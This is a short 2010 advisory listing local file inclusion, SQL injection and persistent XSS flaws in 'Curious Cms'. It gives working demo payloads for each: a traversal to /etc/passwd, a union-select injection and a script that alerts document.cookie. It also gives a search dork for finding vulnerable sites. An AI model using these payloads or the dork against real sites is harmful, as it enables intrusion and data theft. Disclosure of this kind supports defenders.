Curious Cms Multiple Vulns

2010.11.28
Credit: Metropolis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### .:. Author : Metropolis .:. Home : www.metropolis.fr.cr .:. Script : Curious Cms .:. Version : n/a .:. Vulnerable App : http://www.curious.be/?action=onderdeel&onderdeel=40&titel=Diensten .:. Bug Type : Multiple Vulnerabilities / LFI / SQL Injections / XSS .:. Dork : powered by Curious.be #################################################################### Local File Inclusion [ Vulnerable File 1] www.site.com/index.php?action=[LFI] [ Demo ] www.site.com/index.php?action=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 SQL Injections [ Vulnerable File 2] www.site.com/?titel=Nederlands&setLanguage=[SQL] [ Demo ] www.site.com/?titel=Nederlands&setLanguage=1+and+1=0+union+select+1,2,3,4,5-- Persistent XSS [ Vulnerable File 3] www.site.com/?action=[XSS] [ Demo ] www.site.com/?action=<script>alert(document.cookie);</script> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top